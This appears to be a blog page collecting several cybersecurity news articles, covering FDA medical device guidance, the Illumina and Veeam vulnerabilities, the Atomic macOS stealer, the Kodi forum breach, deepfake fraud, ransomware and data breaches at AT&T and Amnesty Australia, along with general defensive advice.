Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

US FDA.
Cyber Attacks Data Theft Digital healthcare system health care industry US FDA.

Healthcare Institutions at Risk Due to Reliance on Technology

As the healthcare system has become more technology-driven, there has been a significant increase in the use of cloud-based and internet applications for delivering facilities. Unfortunately, this has also resulted in an increase in cybersecurity-related risks including breaches, scams, and ransomware attacks which have made the healthcare system incredibly vulnerable. 
The healthcare industry faces a variety of cybersecurity challenges, ranging from malware that can compromise patient privacy to distributed denial of service (DDoS) attacks that can disrupt patient care. The unique nature of the healthcare industry makes it particularly vulnerable to cyber-attacks because they can have consequences beyond financial loss and privacy breaches. 

For example, ransomware is a type of malware that can be especially damaging to hospitals because it can result in the loss of patient data, which can put lives at risk. Therefore, it is very essential for healthcare industries to be vigilant and take necessary steps to protect their systems from cyber threats to ensure that patients' confidential data and lives are not put at risk. 

Following the matter, last month, the Food and Drug Administration (FDA) published a detailed report in which it illustrated certain guidelines against growing concerns about cybersecurity, specifically for medical devices. 

The guidelines require manufacturers to submit a plan for addressing cybersecurity vulnerabilities and to design processes to ensure cyber security.

 1. The manufacturers have to submit a plan for monitoring and addressing cybersecurity vulnerabilities in a reasonable time frame after market release. The plan should include procedures for coordinated vulnerability disclosure. 

 2. Manufacturers must design and maintain processes to ensure that the device and related systems are cyber-secure. 

These guidelines are particularly important for devices that use wireless communications, as they are more vulnerable to cyber-attacks. FDA said that by following these guidelines, manufacturers can help ensure the safety and security of patients who use their medical devices. 

A recent joint report by Censinet, KLAS, and the American Hospital Association (AHA) disclosed that most healthcare organizations are reactive rather than proactive in identifying cybersecurity threats. 

The report found that organizations have low coverage in the supply chain, asset, and risk management, with over 40% not compliant with response and recovery planning with suppliers and third-party providers. These reports send a high alert to healthcare industries since cyber threats are advancing every single day becoming more sophisticated and difficult to tackle 
Read more »
Machine learning
Adversarial attacks Cyber Defenses Cyber Security Data protection Machine learning

Defending Against Adversarial Attacks in Machine Learning: Techniques and Strategies


As machine learning algorithms become increasingly prevalent in our daily lives, the need for secure and reliable models is more important than ever. 

However, even the most sophisticated models are not immune to attacks, and one of the most significant threats to machine learning algorithms is the adversarial attack.

In this blog, we will explore what adversarial attacks are, how they work, and what techniques are available to defend against them.

What are Adversarial Attacks?

In simple terms, an adversarial attack is a deliberate attempt to fool a machine learning algorithm into producing incorrect output. 

The attack works by introducing small, carefully crafted changes to the input data that are imperceptible to the human eye, but which cause the algorithm to produce incorrect results. 

Adversarial attacks are a growing concern in machine learning, as they can be used to compromise the accuracy and reliability of models, with potentially serious consequences.

How do Adversarial Attacks Work?

Adversarial attacks work by exploiting the weaknesses of machine learning algorithms. These algorithms are designed to find patterns in data and use them to make predictions. 

However, they are often vulnerable to subtle changes in the input data, which can cause the algorithm to produce incorrect outputs. 

Adversarial attacks take advantage of these vulnerabilities by adding small amounts of noise or distortion to the input data, which can cause the algorithm to make incorrect predictions.

Understanding White-Box, Black-Box, and Grey-Box Attacks

1. White-Box Attacks

White-box attacks occur when the attacker has complete knowledge of the machine-learning model being targeted, including its architecture, parameters, and training data. Attackers can use various methods to generate adversarial examples that can fool the model into producing incorrect predictions.

Because white-box attacks require a high level of knowledge about the targeted machine-learning model, they are often considered the most dangerous type of attack. 

2. Black-Box Attacks

In contrast to white-box attacks, black-box attacks occur when the attacker has little or no information about the targeted machine-learning model's internal workings. 

These attacks can be more time-consuming and resource-intensive than white-box attacks, but they can also be more effective against models that have not been designed to withstand adversarial attacks.

3. Grey-Box Attacks

Grey-box attacks are a combination of both white-box and black-box attacks. In a grey-box attack, the attacker has some knowledge about the targeted machine-learning model, but not complete knowledge. 

These attacks can be more challenging to defend against than white-box attacks but may be easier to defend against than black-box attacks. 

There are several types of adversarial attacks, including:

Adversarial examples 

These are inputs that have been specifically designed to fool a machine-learning algorithm. They are created by making small changes to the input data, which are not noticeable to humans but which cause the algorithm to make a mistake.

Adversarial perturbations    

These are small changes to the input data that are designed to cause the algorithm to produce incorrect results. The perturbations can be added to the data at any point in the machine learning pipeline, from data collection to model training.

Model inversion attacks

These attacks attempt to reverse-engineer the parameters of a machine-learning model by observing its outputs. The attacker can then use this information to reconstruct the original training data or extract sensitive information from the model.

How can We Fight Adversarial Attacks?

As adversarial attacks become more sophisticated, it is essential to develop robust defenses against them. Here are some techniques that can be used to fight adversarial attacks:

Adversarial training 

This involves training the machine learning algorithm on adversarial examples as well as normal data. By exposing the model to adversarial examples during training, it becomes more resilient to attacks in the future.

Defensive distillation 

This technique involves training a model to produce outputs that are difficult to reverse-engineer, making it more difficult for attackers to extract sensitive information from the model.

Feature squeezing 

This involves reducing the number of features in the input data, making it more difficult for attackers to introduce perturbations that will cause the algorithm to produce incorrect outputs.

Adversarial detection 

This involves adding a detection mechanism to the machine learning pipeline that can detect when an input has been subject to an adversarial attack. Once detected, the input can be discarded or handled differently to prevent the attack from causing harm.

As the field of machine learning continues to evolve, it is crucial that we remain vigilant and proactive in developing new techniques to fight adversarial attacks and maintain the integrity of our models.


Read more »
Zero Trust Security
Cyber Security Data Safety User Safety Zero Trust Zero Trust Security

Utilising Multiple Solutions Makes Your Zero Trust Strategy More Complex

 

According to BeyondTrust, business operational models are much more complicated now than they were a few years ago. 

Integration with zero trust

More applications, information stored and moving through the cloud, remote personnel accessing critical systems and data, and other factors are all contributing to this complexity. 

Threat to supply chain security 

As a result of a company's growing reliance on its supply chain, partners, suppliers, and shippers are now frequently directly linked to its systems. This has increased the demand for identity solutions and a zero trust strategy. 

The results of this study suggest that integration needs could prevent timely implementation. The research for the survey centred on comprehending the adoption rates, occurrences, solutions, obstacles, and new areas of attention for identification and zero trust.

“Today’s business operating models are highly complex, with remote employees accessing critical systems using dozens, and even hundreds of applications,” stated Morey Haber, Chief Security Officer at BeyondTrust. 

“Data is transmitted between clouds and corporate data centers, with third-party contractors and supply chain partners, suppliers, and shippers directly connecting to these corporate systems. Legacy security architectures and network defenses are less effective at managing this extended perimeter. Zero trust principles and architectures are being adopted by public and private sectors because they have become one of the most effective approaches to mitigating the heightened risks to highly sensitive identities, assets, and resources,” concluded Haber. 

Data breaches and identity theft skyrocket 

The study discovered that 81% of respondents had two or more identity-related occurrences in the previous 18 months, making up virtually all of the sample. A sizable portion of these instances included privileged accounts. 

A zero-trust strategy is still being implemented by more than 70% of businesses in order to secure an expanding security perimeter brought on by increased cloud usage and remote workers. 

For their zero trust strategy, almost all businesses said they were utilising multiple vendors and solutions, with the majority citing four or more. 70% of the businesses that were interviewed rely on expensive third-party services, frequently specialised coding, for integration. The deployment procedure was complicated by the fact that 84% of those had zero trust defenses that required several integration strategies. 

Native integration is needed for zero trust solutions 

Over 70% of respondents to a survey stated that they had to remove a security solution because it didn't integrate well, demonstrating how critical integration has become for many businesses. According to those questioned, flaws in their zero trust strategy led to a variety of problems, including a slower rate of issue resolution, poorer user experiences, erroneous access privileges, human intervention, and compliance problems. 

A faster reaction to security risks and enhanced compliance are two benefits of better integration that save time in addition to resources, according to more than 90% of businesses. Important issues affecting businesses 

Identity-related

  • 93% report having identity troubles as a result of integration concerns in the past 18 months
  • 81% of people have reported two or more identity concerns 
  • 63% of respondents claim that identification issues directly included privileged users and credentials, while 5% are unsure.

Zero trust related

  • 76% of businesses are still working to establish a zero-trust strategy to protect their environment
  • 96% of businesses employ several zero-trust strategies, with 56% utilising four or more. 

Integration-related 

  • 70% of businesses are forced to rely on vendor bespoke code for the integration of zero trust solutions
  • 84% of businesses use a variety of integration techniques to implement their zero-trust strategy
  • 99% of businesses say zero trust solutions must be integrated with a wide range of other programmes. 
  • Easy integration is rated as "very important" or "important" by 94% of participants, with none saying it isn't.
To lessen the burden of integration processes, practically every organisation said that a zero trust approach requires integration with multiple other business and collaboration apps. Most have made native integration a crucial consideration for choosing zero-trust solutions due to integration problems. 

Read more »
Telegram
Cyberattacks CyberCrime Data Breach database Kodi MyBB Telegram

Forum Database Sold Online After Kodi Data Breach

 


Hackers have breached the Kodi Foundation's MyBB forum database, stealing user information such as email addresses and private messages which were tried to be sold online. 

In other words, it is an open-source, cross-platform media player, organizer, and streaming suite that includes several third-party options that allow users to access and stream content from a variety of sources as well as customize their experience as they see fit based upon their personal preferences. 

Several months ago, the Kodi Foundation published a statement revealing that it had been breached by hackers. This was after the organization's MyBB forum database, containing user information and private messages, was stolen and sold online. 

To create backups of the databases, the threat actors abused the account by downloading and deleting backups of the databases. The database's nightly full backups were also downloaded, in addition to the existing data backups. A disablement request has now been sent to the account in question. 

The non-profit organization developed Kodi media center, a free and open-source software entertainment hub, and media player. According to a breach notice published on April 8, the Kodi Team learned of unauthorized access after a data dump of its forum user base (MyBB) was offered for sale online. 

The now-defunct Kodi forum had about 401,000 users who posted 3 million messages covering various topics, including video streaming, suggestions, support, sharing upcoming add-ons, and more. Hackers took over the forum database by accessing the admin interface with inactive staff credentials, according to a site statement on Saturday. 

In the aftermath of the breach, the developer has shut down. The forum, which was home to over 3 million posts, is working to perform a global password reset, as it is assumed that “all passwords are compromised” despite being stored in an encrypted format. 

In an update published earlier today, Kodi's administrators informed the community that they are commissioning an updated forum server. As a result, the existing systems do not appear to have been compromised. 

The forum will be redeployed using the latest MyBB version. This comes with a heavy workload required to incorporate custom functional changes and backport security fixes, so a delay of "several days" is to be expected. 

Kodi shares a list of exposed email addresses associated with forum accounts with the Have I Been PWNed data breach notification service. 

Even though these passwords were hashed and salted, Kodi warns that all passwords should be viewed as compromised for the time being. It may be possible that service availability will be affected if the admin team plans a global password reset. 

According to Kodi's release, any sensitive information transmitted to other users through the user-to-user messaging system may have been compromised, along with any sensitive data sent between users. If you previously used the same login and password for a website, you should follow the instructions on that website for resetting your password or changing it. 

On February 15th, 2023, Amius claimed to have sold a database dump on a website under its brand. According to the database, there are 400,314 Kodi forum members, including "several IPTV resellers," listed in the database. 

There is no information regarding the database price as the seller accepted a private offer over Telegram. The Breached forum is one of the largest hacking and data leak forums. It has developed its reputation over the past few years for hosting, leaking, and selling breaches of companies, governments, and various other organizations. 
Read more »
Sensitive data
Binance Deepfakes Malicious actor malware Sensitive data

The Threat of Deepfakes: Hacking Humans

Deepfake technology has been around for a few years, but its potential to harm individuals and organizations is becoming increasingly clear. In particular, deepfakes are becoming an increasingly popular tool for hackers and fraudsters looking to manipulate people into giving up sensitive information or making financial transactions.

One recent example of this was the creation of a deepfake video featuring a senior executive from the cryptocurrency exchange Binance. The video was created by fraudsters with the intention of tricking developers into believing they were speaking with the executive and providing them with access to sensitive information. This kind of CEO fraud can be highly effective, as it takes advantage of the trust that people naturally place in authority figures.

While deepfake technology can be used for more benign purposes, such as creating entertaining videos or improving visual effects in movies, its potential for malicious use is undeniable. This is especially true when it comes to social engineering attacks, where hackers use psychological tactics to convince people to take actions that are not in their best interest.

To prevent deepfakes from being used to "hack the humans", it is important to take a multi-layered approach to security. This includes training employees to be aware of the risks of deepfakes and how to identify them, implementing technical controls to detect and block deepfake attacks, and using threat intelligence to stay ahead of new and emerging threats.

At the same time, it is important to recognize that deepfakes are only one of many tools that hackers and fraudsters can use to target individuals and organizations. To stay protected, it is essential to maintain a strong overall security posture, including regular software updates, strong passwords, and access controls.

The most effective defense against deepfakes and other social engineering attacks is to maintain a healthy dose of skepticism and critical thinking. By being aware of the risks and taking steps to protect yourself and your organization, you can help ensure that deepfakes don't "hack the humans" and cause lasting harm.
Read more »
Vulnerabilities and Exploits
CISA FDA Illumina medical data stolen Security flaw Stolen Data US Government Vulnerabilities and Exploits

Illumina: FDA, CISA Warns Against Security Flaw Making Medical Devices Vulnerable to Remote Hacking


The US Government has issued a warning for healthcare providers and lab employees against a critical flaw, discovered in the genomics giant Illumina’s medical devices, used by threat actors to alter or steal sensitive patient medical data.

On Thursday, US cybersecurity agency CISA and US Food and Drug Administration FDA released separate advisories to alert organizations of the vulnerabilities affecting the Universal Copy Service (UCS) component used by a number of Illumina's genetic sequencing devices.

The vulnerability flaw, identified as CVE-2023-1968 enables remote access to a vulnerable device via the internet without the need for a password. If exploited, hackers may be able to compromise devices and cause them to generate false, changed, or nonexistent results. 

The advisories also include a second vulnerability, CVE-2023-1966, which is rated 7.4 out of 10 for severity. The flaw might provide hackers access to the operating system level, where they could upload and run malicious programs to change settings and access private information on the impacted product.

The FDA claimed it was unaware of any actual attacks that exploited the flaws, but it did issue a warning that a hacker might use them to remotely control a device or change its settings, software, or data, as well as remotely access the user's network.

“On April 5, 2023, Illumina sent notifications to affected customers instructing them to check their instruments and medical devices for signs of potential exploitation of the vulnerability,” states the FDA in its notification. 

The products from Illumina that are vulnerable include iScan, iSeq, MiniSeq, MiSeq, MiSeqDx, NextSeq, and NovaSeq. These products, which are used all around the world in the healthcare industry, are made for clinical diagnostic use when sequencing a person's DNA for different genetic diseases or research needs.

According to Illumina spokesperson David McAlpine, Illumina has “not received any reports indicating that a vulnerability has been exploited, nor do we have any evidence of any vulnerabilities being exploited.” Moreover, he declines to comment on whether the company has technical resources that could detect exploitation, nor did he specify the number of devices affected by the vulnerability.

Illumina CTO Alex Aravanis in a LinkedIn post mentions that the company detected the flaw as part of routine efforts to examine its software for potential flaws and exposures.

“Upon identifying this vulnerability, our team worked diligently to develop mitigations to protect our instruments and customers[…]We then contacted and worked in close partnership with regulators and customers to address the issue with a simple software update at no cost, requiring little to no downtime for most,” Aravanis said.  

Read more »
Vulnerabilities and Exploits
Crypto Wallet Data Safety Security Vulnerabilities and Exploits

This New macOS Info-stealer in Town is Targeting Crypto Wallets

 

A new info-stealer malware has been identified, designed to steal a wide range of personal data, comprising local files, cookies, financial information, and passwords stored in macOS browsers. It's called Atomic macOS Stealer (aka AMOS, or simply Atomic), and its developer is constantly adding new capabilities to it. 

The most recent update was issued on April 25. According to the Cyble research team, Atomic is available on a private Telegram channel for a $1,000 monthly fee. A DMG installer file, a cryptocurrency checker, the brute-forcing program MetaMask, and a web panel to oversee assault campaigns are all provided to the customer.

The malicious DMG file is designed to avoid detection and has been identified as malware by only one (out of 59) AV engines on VirusTotal. When the victim runs this DMG file, it displays a password prompt disguised as a macOS system notice, encouraging the user to input the system password.

After getting the system password, it attempts to steal passwords stored in the default password management tool Keychain. This includes WiFi passwords, credit card information, site logins, and other critical information. Atomic is built with a variety of data-theft features, allowing its operators to target various browsers and crypto wallets, among other things.

It checks the system for installed applications in order to steal information from it. Cryptocurrency wallets (Binance, Electrum, Atomic, and Exodus) and web browsers (Google Chrome, Microsoft Edge, Firefox, Opera, Yandex, and Vivaldi) are among the programs targeted.

It also targets over 50 cryptocurrency wallet extensions, such as Coinbase, Yoroi, BinanceChain, Jaxx Liberty, and Guarda. Furthermore, it attempts to steal system information such as the Model name, RAM size, number of cores, serial number, UUID number, and others.

Atomic is another example of the growing number of cyber dangers threatening macOS. Researchers have already discovered two new threats, the RustBucket Malware and a new LockBit variation, indicating an interest in Apple's core operating system, which powers Mac computers.

As a result, it is past time for Mac users to recognise the growing threat and enhance their security posture.
Read more »
Vulnerability
Cyber Security Cybersecurity Data Backup FIN7 Veeam Backup and Replication Vulnerability

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.

The reason behind the vulnerability is that some organizations use insecure configurations when setting up their Veeam backup servers, making them accessible over the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.


Read more »
Sophos
Crypto Cyber Attacks Encryption Ransomware Attacks. RSA Sophos

The Persistent Threat of Ransomware: RSA Conference 2023 Highlights

The cybersecurity industry's highest-profile annual gathering, the RSA Conference, has focused heavily on the ongoing and increasing threat of ransomware. Last year, 68% of all cyberattacks involved ransomware, according to cybersecurity firm Sophos. 

The National Security Agency's director of cybersecurity, Rob Joyce, recently confirmed that Russian hackers are now weaponizing ransomware to target Ukrainian logistics companies and organizations in Western-allied countries.

Ransomware typically begins with file-encrypting malware being installed on an organization's network, which is then followed by a ransom note displayed on every screen. Hackers demand payment, often in cryptocurrency, to unlock the networks and prevent any data leaks. In recent years, ransomware has affected schools, hospitals, small businesses, and more.

At RSA, conversations have shifted from viewing ransomware as a mere annoyance to a persistent and dangerous threat. A panel on the last day of the conference acted out a hypothetical response to an Iran-backed ransomware attack on US banks in 2025, highlighting the severity of the threat.

The shift in perspective is in response to the increasing sophistication and persistence of ransomware attacks, as well as the fact that cybercriminals have been successful in monetizing their activities. The use of cryptocurrency for payment also makes it more difficult for law enforcement to trace the source of the attacks.

Ransomware attacks are now considered to be a "forever problem," meaning they will be a persistent threat for the foreseeable future. Organizations and individuals must take proactive steps to prevent attacks, including maintaining strong security measures and regularly backing up data. It is also crucial to be vigilant for any suspicious activity and to report any potential attacks immediately to the appropriate authorities.

In conclusion, ransomware attacks continue to be a major concern for cybersecurity professionals, and their impact will only continue to grow. Organizations and individuals must be proactive in their cybersecurity measures to prevent attacks and minimize damage.

Read more »
online currency
AT&T cryptocurrency cyber attack Cyber Attacks online currency

Hackers are Breaking Into AT&T to Steal Cryptocurrency

In recent news, individuals with AT&T email addresses are being targeted by unknown hackers who are using their access to break into victims' cryptocurrency exchange accounts and steal their digital assets. Cryptocurrency exchanges are online platforms that allow users to buy, sell, and trade digital currencies like Bitcoin and Ethereum. 

To use a cryptocurrency exchange, users need to create an account and provide personal information for identity verification. They can then deposit traditional currencies and use them to purchase digital currencies. 

According to an anonymous source, cybercriminals have discovered a way to gain unauthorized access to the email accounts of AT&T users, including those with email domains such as att.net, sbcglobal.net, and bellsouth.net. 

These hackers exploit a section of AT&T's internal network to create mail keys for any user. Mail keys are unique credentials that allow AT&T email users to access their accounts via email applications like Thunderbird or Outlook without using their passwords.

Once the hackers obtain a target's mail key, they use an email app to access the victim's account and reset passwords for more valuable services like cryptocurrency exchanges. This leaves the victim vulnerable, as the hackers can easily reset passwords for Coinbase or Gemini accounts via email, transferring the victim's digital assets to their own accounts and leaving the victim with nothing. 

One of the victims reported that “it is Very frustrating because it is obvious that the ‘hackers’ have direct access to the database or files containing these customer Outlook keys, and the hackers don’t need to know the user’s AT&T website login to access and change these outlook login keys”. 

AT&T spokesperson Jim Kimberly acknowledged the unauthorized creation of secure mail keys that allow access to email accounts without passwords. The company has since updated its security controls and proactively required a password reset on some email accounts. 

“We identified the unauthorized creation of secure mail keys, which can be used in some cases to access an email account without needing a password. We have updated our security controls to prevent this activity. As a precaution, we also proactively required a password reset on some email accounts,” he added. 

However, Kimberly further said that the hackers had no access to the internal systems of the company. “There was no intrusion into any system for this exploit. The bad actors used an API access.”
Read more »
User Privacy
Australia Charity Organisation Data Breach Data Leak Human rights User Privacy

Amnesty International Takes a While to Disclose the Data Breach From December

 

Amnesty International Australia notified supporters via email last Friday that their data might be at risk owing to "anomalous activity" discovered in its IT infrastructure. 

The email was sent extremely late in the day or week, but it was also sent very far after the behaviour was discovered. The email, which Gizmodo Australia saw, claims that the activity was discovered towards the end of last year. 

“As soon as we became aware of this activity on 3 December 2022, we engaged leading external cyber security and forensic IT advisors to determine if any unauthorised access to our IT environment had occurred,” Amnesty International Australia stated.

“We acted quickly to ensure the AIA IT environment was secure and contained, put additional security measures in place and commenced an extensive investigation.” 

Amnesty International said that while it took the organisation some time to notify its supporters of a security breach, the investigation is now complete and has revealed that an unauthorised third party temporarily got access to its IT system. 

“In the course of this investigation, we identified that some low-risk information relating to individuals who made donations in 2019 was accessed, but of low risk of misuse,” the organisation added. 

Although "low risk" information was not defined, it is clear from the security advice that it offered that the data is most likely name, email address, and phone number. Despite being satisfied that the information obtained through the breach won't be used inappropriately, Amnesty International Australia advised its supporters to "carefully scrutinise all emails," "don't answer calls from unknown or private numbers," and "never click on links in SMS messages or social media messages you are not expecting to receive." 

The breach only affected the local arm of the charity, according to Amnesty International Australia, and did not affect any other branches. The statement further stated that although the scope of the "information accessed in the cyber event" did not match the requirements or level for notification under the Notifiable Data Breaches Scheme, Amnesty International Australia had decided to notify its supporters" in the interest of transparency".
Read more »
Subscribe to: Comments (Atom)